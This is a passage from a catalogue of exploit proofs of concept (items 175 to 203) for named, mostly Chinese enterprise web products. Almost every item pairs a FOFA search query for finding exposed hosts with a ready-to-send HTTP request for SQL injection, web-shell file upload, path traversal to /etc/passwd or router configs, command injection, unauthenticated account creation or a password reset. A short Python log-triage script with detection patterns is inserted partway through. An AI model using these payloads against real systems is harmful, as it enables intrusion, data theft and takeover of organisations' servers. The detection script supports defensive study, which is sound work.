175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

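For the defenders this article is written for, the request lines of items 160 to 175 are also detection material. The Python below is an added example, not from the article or any vendor: it percent-decodes each request target repeatedly, since the Nexus PoC hides ../ behind %2F and item 178 below uses %2e%2e, and flags three pattern families seen above: path traversal, SQL injection markers (WAITFOR DELAY, SLEEP(), updatexml, ctxsys.drithsx.sn, INTO OUTFILE) and shell metacharacters in a parameter value as in the TBK DVR mdc field. The log lines are constructed from the PoC request lines; IPs and timestamps are fictitious.

```python
"""Triage web access logs for the request shapes catalogued in items 160-175
above: percent-encoded path traversal (Nexus), time-based SQL injection
(通天星, 金和OA, 宏景EHR) and shell metacharacters in a parameter (TBK DVR).

Added example, not part of the original article. The log lines below are
constructed for the demo from the PoC request lines; IPs and timestamps are
fictitious.
"""
import re
from urllib.parse import unquote

# Common/combined log format: client IP first, request line in the first quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

TRAVERSAL_RE = re.compile(r"\.\.[/\\]")          # any ../ or ..\ after decoding
SQLI_RE = re.compile(
    r"waitfor\s+delay|sleep\s*\(|updatexml\s*\(|drithsx\.sn|into\s+outfile",
    re.IGNORECASE,
)
SHELL_META_RE = re.compile(r"[;|`]|\$\(|&&|>\s*/")  # separators / redirects


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded), so
    %2e%2e%2f and %252e%252e%252f both end up as '../'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_target(target: str) -> list:
    """Return the pattern families matched by one request target."""
    decoded = fully_decode(target)
    _, _, query = decoded.partition("?")
    hits = []
    if TRAVERSAL_RE.search(decoded):      # in the path or in a parameter value
        hits.append("traversal")
    if SQLI_RE.search(decoded):
        hits.append("sqli")
    if query and SHELL_META_RE.search(query):
        hits.append("cmd-inject")
    return hits


def triage(lines):
    """Return (ip, method, target, hits) for every line that matches a pattern."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_target(m.group("target"))
        if hits:
            findings.append((m.group("ip"), m.group("method"), m.group("target"), hits))
    return findings


SAMPLE_LOG = [  # constructed; request targets taken from the PoCs in this section
    '203.0.113.10 - - [01/Jun/2024:10:00:01 +0800] "GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1834',
    '203.0.113.11 - - [01/Jun/2024:10:00:02 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20ls%20-l%20%2Fvar%3B HTTP/1.1" 200 512',
    '203.0.113.12 - - [01/Jun/2024:10:00:03 +0800] "GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1" 200 77',
    '203.0.113.13 - - [01/Jun/2024:10:00:04 +0800] "GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1" 200 903',
    '198.51.100.5 - - [01/Jun/2024:10:00:05 +0800] "GET /static/js/app.js?v=1.2.3 HTTP/1.1" 200 40210',
]

if __name__ == "__main__":
    for ip, method, target, hits in triage(SAMPLE_LOG):
        print(f"{ip} {method} {hits} {target[:60]}")
```

Feed real logs with triage(open(path)). The shell-metacharacter rule is the noisiest of the three (a ';' appears legitimately in some frameworks' URLs), so treat it as a secondary signal. POST bodies such as the Check Point MyCRL payload in item 173 never reach an access log; for those you need a WAF or reverse-proxy body log.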
176. 电信网关配置管理系统 rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
Request each path below with a plain GET; the .cfg file name follows the router model.
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C校园网自助服务系统 flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Dispos ition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

The form-field name becomes the stored file name; fetch it with:
GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统 arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Oracle error-based probe: the product 111111*111111 (12345654321) showing up in the ctxsys.drithsx.sn error confirms the injection.

184. 迅饶科技 X2Modbus 网关 AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼应用虚拟化系统 SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

Decoded, the injected statement is ');select unhex('...') into outfile '.\\..\\..\\WebRoot\\plom.xgi'# and the hex string is the PHP stub <?php echo md5("1"); $file = __FILE__; unlink($file); which is written into the web root as plom.xgi (stacked query plus INTO OUTFILE, so it needs FILE privilege and a writable web root).

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power plants.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

SQLite heavy-query (time-based) payload: the large RANDOMBLOB makes the query measurably slow when the injected expression is evaluated.

187. Mura CMS processAsyncObject SQL injection (time-based variant of item 158)
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. 山石网科 (Hillstone) 云鉴 Security Management System setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE Enterprise Operations Management Platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 Internet Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. Henan 风速科技 Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (Aliyun Drive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit system assetsmanager_upload endpoint file upload

1. Run the PoC to obtain the CSRF token, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, return value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get the cookie:
POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, return value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) Omni-media News Editing System binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云 (Redsea) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--